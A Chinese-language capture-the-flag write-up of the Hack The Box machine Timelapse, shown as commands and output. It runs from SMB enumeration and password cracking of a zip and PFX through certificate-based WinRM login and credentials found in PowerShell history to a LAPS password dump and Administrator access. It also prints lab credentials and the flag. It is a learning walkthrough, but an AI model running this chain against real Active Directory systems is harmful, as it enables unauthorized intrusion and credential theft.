文章

HTB Timelapse

发表于 2026-02-14 更新于 2026-02- 14
作者 ENOCH
21~27 分钟 阅读

先nmap

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2026-02-14 15:35:13Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49694/tcp open  msrpc             Microsoft Windows RPC
50976/tcp open  msrpc             Microsoft Windows RPC
​

从端口上看,应该是DC了,开了smb,先看看

# smbclient -L //10.129.248.148
​
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Shares          Disk      
    SYSVOL          Disk      Logon server share

试一下匿名访问,发现Shares下有压缩包

# smbclient -N //10.129.248.148/Shares
smb: \> ls
  .                                   D        0  Mon Oct 25 10:39:15 2021
  ..                                  D        0  Mon Oct 25 10:39:15 2021
  Dev                                 D        0  Mon Oct 25 14:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 10:48:42 2021
​
        6367231 blocks of size 4096. 1341632 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 14:40:06 2021
  ..                                  D        0  Mon Oct 25 14:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 10:46:42 2021
​
        6367231 blocks of size 4096. 1341632 blocks available

下载下来解压看看,发现需要密码,尝试破解

# zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)

解压得到legacyy_dev_auth.pfx,访问还是需要密码,继续破解

# pfx2john legacyy_dev_auth.pfx > pfx_hash
# john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash
thuglegacy       (legacyy_dev_auth.pfx)    

转换证书格式,提取证书和私钥

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
openssl x509 -in certificate.pem -out certificate.crt
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out pair.key
openssl rsa -in pair.key -out pri.key
openssl rsa -in pair.key -pubout -out pub.key

连接

evil-winrm -S -k pri.key -c certificate.crt -i 10.129.248.148

查看powershell历史记录发现内容

*Evil-WinRM* PS C:\Users\legacyy\Desktop> Get-Content C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

发现账号密码,看一下svc_deploy用户的信息

*Evil-WinRM* PS C:\Users\legacyy\Desktop> net user svc_deploy
<...>
Global Group memberships     *LAPS_Readers         *Domain Users

发现是LAPS_Readers组成员,看名字应该能读取LAPS信息

# nxc ldap 10.129.248.148 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
SMB         10.129.248.148  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP        10.129.248.148  389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS        10.129.248.148  389    DC01             [*] Getting LAPS Passwords
LAPS        10.129.248.148  389    DC01             Computer:DC01$ User:                Password:M!b%0&9+kr$5e;Uc;JUR@4h$

拿到密码,登录

evil-winrm -i 10.129.248.148 -u Administrator -p 'M!b%0&9+kr$5e;Uc;JUR@4h$' -S

找到flag

*Evil-WinRM* PS C:\Users\TRX\Desktop> ls
​
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/14/2026   7:27 AM             34 root.txt
​
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
d4fd28c0a225eba58f2b9ec3f841f7c9

学到了密码爆破,history信息收集,LAPS_Readers读取密码等

hackthebox
wp
许可协议:  CC BY 4.0